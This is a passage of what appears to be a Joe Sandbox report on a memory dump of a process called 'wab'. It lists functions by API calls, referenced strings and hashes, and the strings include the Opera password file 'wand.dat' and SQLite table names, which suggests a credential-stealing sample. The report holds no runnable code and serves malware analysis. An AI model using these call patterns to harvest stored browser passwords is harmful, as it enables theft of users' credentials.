                                                            • API String ID: 3384217055-0
                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                            • String ID:
                                                            • API String ID: 1889144086-0
                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                            • String ID:
                                                            • API String ID: 1661045500-0
                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                            • memcpy.MSVCRT ref: 0042EC7A
                                                            Strings
                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                            • API String ID: 1297977491-2063813899
                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040560C
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                            • String ID: *.*$dat$wand.dat
                                                            • API String ID: 2618321458-1828844352
                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                            • wcslen.MSVCRT ref: 00410C74
                                                            • _wtoi.MSVCRT ref: 00410C80
                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                            • String ID:
                                                            • API String ID: 1549203181-0
                                                            • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                            • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00412057
                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                            • String ID:
                                                            • API String ID: 3550944819-0
                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                            • memcpy.MSVCRT ref: 0040A94F
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@$memcpy$mallocwcslen
                                                            • String ID:
                                                            • API String ID: 3023356884-0
                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                            • memcpy.MSVCRT ref: 0040B248
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@$memcpy$mallocwcslen
                                                            • String ID:
                                                            • API String ID: 3023356884-0
                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: @
                                                            • API String ID: 3510742995-2766056989
                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@memcpymemset
                                                            • String ID:
                                                            • API String ID: 1865533344-0
                                                            • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                            • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • strlen.MSVCRT ref: 0040B0D8
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                            • memcpy.MSVCRT ref: 0040B159
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@$memcpy$mallocstrlen
                                                            • String ID:
                                                            • API String ID: 1171893557-0
                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004144E7
                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                              • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                            • memset.MSVCRT ref: 0041451A
                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                            • String ID:
                                                            • API String ID: 1127616056-0
                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: sqlite_master
                                                            • API String ID: 438689982-3163232059
                                                            • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                            • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                            • String ID:
                                                            • API String ID: 3917621476-0
                                                            • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                            • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                            • wcscat.MSVCRT ref: 0041101F
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                            • String ID:
                                                            • API String ID: 822687973-0
                                                            • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                            • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                                            • malloc.MSVCRT ref: 00417459
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76F8DF80,?,0041755F,?), ref: 00417478
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$??3@malloc
                                                            • String ID:
                                                            • API String ID: 4284152360-0
                                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                            • String ID:
                                                            • API String ID: 2678498856-0
                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item
                                                            • String ID:
                                                            • API String ID: 3888421826-0
                                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00417B7B
                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                            • String ID:
                                                            • API String ID: 3727323765-0
                                                            • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                            • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                            • malloc.MSVCRT ref: 00417407
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$??3@malloc
                                                            • String ID:
                                                            • API String ID: 4284152360-0
                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040F673
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                            • strlen.MSVCRT ref: 0040F6A2
                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                            • String ID:
                                                            • API String ID: 2754987064-0
                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
